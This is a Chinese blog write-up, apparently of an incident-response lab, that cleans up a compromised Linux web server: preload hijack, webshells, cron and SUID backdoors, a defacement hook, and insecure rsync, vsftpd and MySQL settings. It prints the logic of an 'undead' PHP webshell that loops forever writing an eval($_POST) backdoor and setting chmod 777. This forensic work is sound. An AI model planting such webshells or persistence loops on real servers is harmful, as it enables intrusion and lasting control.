ire5

IRE5

1、据现象分析:所有情况下弹出hacked的提示,

可能的问题是动态链接库劫持,

需要检查/etc/ld.so.preload

d2b5ca33bd154659

存在动态链接库劫持

d2b5ca33bd155912

先修复

d2b5ca33bd155926

现象解除后对hook.so进行分析

微步和360分析都没问题

d2b5ca33bd160210

d2b5ca33bd160251

也可能是内核层的问题,但比赛不会到这个难度

2、据现象分析,被上传了后门,

思路需要了解网站的web类型,

发现运行的是apache服务,先找网站目录位置

d2b5ca33bd160352

先找配置文件,在配置文件中查看网站目录位置

d2b5ca33bd160514

d2b5ca33bd160525

d2b5ca33bd160642

如果能下载源代码,将其投入到D盾这类分析工具,或者手工检查是否有包含一句话木马的文件

手动查找木马文件

d2b5ca33bd160737

D盾工具进行扫描

d2b5ca33bd160825

手动删除掉这些木马文件后,发现还有一个.config.php存在,无法删除,
分析原因这是一个不死马,只要生成它的程序在运行这个文件就回无限的重复执行,
需要删掉它的生成文件,并杀死掉它运行的进程,
再重启apache服务后,才能删掉这个.config.php

3、据现象分析,即便重装,仍有后门,

考虑是否有不死马,检查方法,分析木马文件,查看是否存在逻辑是不断循环写入木马到文件中,如何查杀不死马?重启服务,或关闭进程,或重新覆写不死马的目标文件内容为空并修改文件权限,不允许其它人修改等

d2b5ca33bd160940

不死马

ignore_user_abort(true);客户端断开连接时脚本会继续执行
set_time_limit(0); 脚本没有时间限制,可以一直执行下去
while (1);无限循环
$path = “/var/www/html/module/user/.config.php”;定义了要写入的文件路径
$data = “<?php @eval(\$_POST[‘cmd’]);?>”;定义了写入内容
函数将 $data 内容写入到指定的文件 $path 中
system(‘chmod 777 ‘.$path); 通过 shell 命令将文件权限设置为 777
usleep(100); 每次暂停0.1 毫秒

d2b5ca33bd161103

d2b5ca33bd161150

4、计划任务?系统级,用户级

系统级计划任务存在写入一句话木马

d2b5ca33bd161317

d2b5ca33bd161330

d2b5ca33bd161341

用户级计划任务

/etc/cron.daily下Passwd任务功能为遍历这四个文件,如果存在就备份

passwd group shadowg shadow

d2b5ca33bd161403

其他天,周,月任务没啥问题

d2b5ca33bd161430

d2b5ca33bd161443

5、检查后门帐号,

cat /etc/passwd

无后门

d2b5ca33bd161505

d2b5ca33bd161534

6、据现象分析:挂黑页,

检查方法,看首页源代码,删除黑链

d2b5ca33bd161600

直接查看主页不显示那句话,因为那句话是加载项引入的

d2b5ca33bd161640

查看加载项hook/ad.hook.php

存在php decrypt()加密内容

单独提取出来后发现是那句<h>You have been hacker by me, either pay or destory your website

d2b5ca33bd162014

单独提取出来后发现是那句<h>You have been hacker by me, either pay or destory your website

d2b5ca33bd162032

就可以把那段代码全部删掉了

主页正常了,

d2b5ca33bd162056

7、查历史命令,

注意.bashrc 和.ssh目录下的公钥文件

.bashrc配置了Bash shell的行为和环境变量

.ssh为空目录

d2b5ca33bd162158

8、查开机启动项

d2b5ca33bd162222

ssh和vsftpd启动项

d2b5ca33bd162240

9、查提权后门,

find / -perm 4000看有无可疑文件有suid标记

存在可疑文件/var.shell

d2b5ca33bd162307

存在可疑文件/var.shell

太厉害这个

d2b5ca33bd162411

d2b5ca33bd162424

/sbin/my_init 初始化系统的脚本

/etc/my_init.d/start.sh删除主页重启一堆服务再开启rsync和vsftp,加载内存马后删除文件

d2b5ca33bd162458

d2b5ca33bd162518

10、分析攻击路径,/var/log

apache的access日志无内容,error的日志内容全是Sry~You have been hacked!

d2b5ca33bd162550

其余为apt安装日志
rsyncd日志
mysql日志
dpkg日志

和pts记录

11、分析环境变量 env

flag ~

d2b5ca33bd162612

12、分析服务,及网络连接

d2b5ca33bd162646

存在网络连接的服务

rsync服务

未设置访问控制和访问认证

d2b5ca33bd162707

可以未授权访问

d2b5ca33bd162727

修复配置

d2b5ca33bd162748

Apache服务

Vsftp服务

未关闭匿名登录

d2b5ca33bd162818

d2b5ca33bd162845

修复

d2b5ca33bd162908

ssh服务

Mysql服务

存在无密码登录

d2b5ca33bd162926

修复

d2b5ca33bd163003

并且配置中存在密码

d2b5ca33bd163023

13、查网站CMS框架漏洞

PHPSHE1.7商业版

Phpshe v1.7 SQL盲注漏洞(CVE-2019-9626)

Phpshe (XXE)CVE-2019-9761

d2b5ca33bd163111

d2b5ca33bd163140

14、查后台数据库是否有弱口令,空口令等

admin账号密码也是admin

d2b5ca33bd163208

d2b5ca33bd163238

d2b5ca33bd163250

无其他用户

© 版权声明
THE END
喜欢就支持一下吧
点赞14 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

    暂无评论内容